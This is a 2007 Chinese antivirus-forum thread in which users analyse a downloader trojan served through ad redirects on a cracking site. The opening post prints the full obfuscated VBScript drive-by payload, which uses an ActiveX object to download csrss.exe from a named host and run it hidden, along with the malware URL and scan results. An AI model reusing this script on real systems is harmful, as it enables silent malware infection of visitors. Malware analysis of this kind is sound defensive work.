查看: 4839|回复: 17
收起左侧

从中国破解联盟主页找到的下载者一个

[复制链接]
dikex
发表于 2007-4-7 00:48:07 | 显示全部楼层 |阅读模式
http://www.cncrk.com/  >>> http://ad2.mayiad.com/code/ad010.asp?id=211 >>> http://ad2.mayiad.com/code/id_detai.htm >>>

on error resume next curl="http://ad2.mayiad.com/soft/csrss.exe" fname1="csrss.exe" fname2="csrss.vbs" Set df = document.createElement("object") df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft.XMLHTTP" Set x = df.CreateObject(str,"") C1="Ado" C2="db." C3="str" C4="eam" str1=C1&C2&C3&C4 str5=str1 set S = df.createobject(str5,"") S.type = 1 str6="GET" x.Open str6, curl, False x.Send s1="Script" s2="ing." s3="File" s4="SystemObject" s0=s1+s2+s3+s4 set F = df.createobject(s0,"") set tmp = F.GetSpecialFolder(2) fname1= F.BuildPath(tmp,fname1) S.open S.write x.responseBody S.savetofile fname1,2 S.close fname2= F.BuildPath(tmp,fname2) Set ts = F.OpenTextFile(fname2, 2, True) ts.WriteLine "Set Shell = CreateObject(""Shell.Application"")" sql="Shell.ShellExecute """+fname1+""","""","""",""open"",0" ts.WriteLine sql ts.close if F.FileExists(fname1)=true then if F.FileExists(fname2)=true then     set Q = df.createobject("Shell.Application","")     Q.ShellExecute fname2,"","","open",0 end if end if

>>> http://ad2.mayiad.com/soft/csrss.exe

>>>
ArcaVir1.0.4Clean2.73823 secs
avast!3.0.0Clean0.015183 secs
AVG Anti Virus7.5.45Clean2.27977 secs
BitDefender7.1Clean3.92912 secs
CAT QuickHeal9.00Clean4.47865 secs
ClamAV0.90/3028Clean0.245847 secs
Dr. Web4.33.0Clean8.09897 secs
F-PROT4.6.7Unknown20.0971 secs
F-Secure1.02Clean0.351564 secs
H+BEDV AntiVir2.1.10-32NULL5.32925 secs
McAfee Virusscan5.10.0New Malware.aq1.61741 secs
NOD322.51.1Clean7.94989 secs
Norman Virus Control5.70.01NULL6.24114 secs
Panda9.00.00Clean1.50192 secs
Sophos Sweep4.16.0Mal/Packer4.00671 secs
Trend Micro8.310-1002Clean0.0624151 secs
VBA323.11.3Clean6.62701 secs
VirusBuster1.3.3Packed/NSPack2.11167 secs

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
小邪邪
发表于 2007-4-7 00:49:42 | 显示全部楼层

mcafee,又不让进了,晕

2007-4-7        0:49:05       
已由访问保护规则禁止csrss\csrss.exe       
防病毒标准保护:禁止伪装 Windows 进程       
已阻止的操作: 创建
mofunzone
发表于 2007-4-7 00:50:32 | 显示全部楼层
秒杀

Starting the file scan:

Begin scan in 'C:\Documents and Settings\morgan\My Documents\csrss.rar'
C:\Documents and Settings\morgan\My Documents\
  csrss.rar
    [0] Archive type: RAR
    --> csrss.exe
        [DETECTION] Is the Trojan horse TR/Delphi.Downloader.Gen
        [WARNING]   Infected files in archives cannot be repaired!
        [INFO]      The file was deleted!
风野胤
发表于 2007-4-7 00:56:06 | 显示全部楼层
没有报
上报了
这个可不敢运行
剑指七星
发表于 2007-4-7 00:56:39 | 显示全部楼层
卡巴没有反应
欠妳緈諨
发表于 2007-4-7 00:58:20 | 显示全部楼层
我的avast!怎么下载就报 ,LZ扫描有问题吧

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
aoyang
头像被屏蔽
发表于 2007-4-7 01:01:45 | 显示全部楼层
下载者,运行后报高危险。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
dikex
 楼主| 发表于 2007-4-7 01:02:12 | 显示全部楼层
原帖由 欠你幸福 于 2007-4-7 00:58 发表
我的avast!怎么下载就报 ,LZ扫描有问题吧


直接在多引擎扫描页面里面扫描的,可能它用的版本比较旧吧
solcroft
发表于 2007-4-7 01:06:22 | 显示全部楼层
avast!还用3.0版本的引擎,过时5年了
其实才发现到avast!脱壳也真牛
欠妳緈諨
发表于 2007-4-7 01:11:21 | 显示全部楼层
我现在玩的的是avast4.7.971
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 01:30 , Processed in 0.136090 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表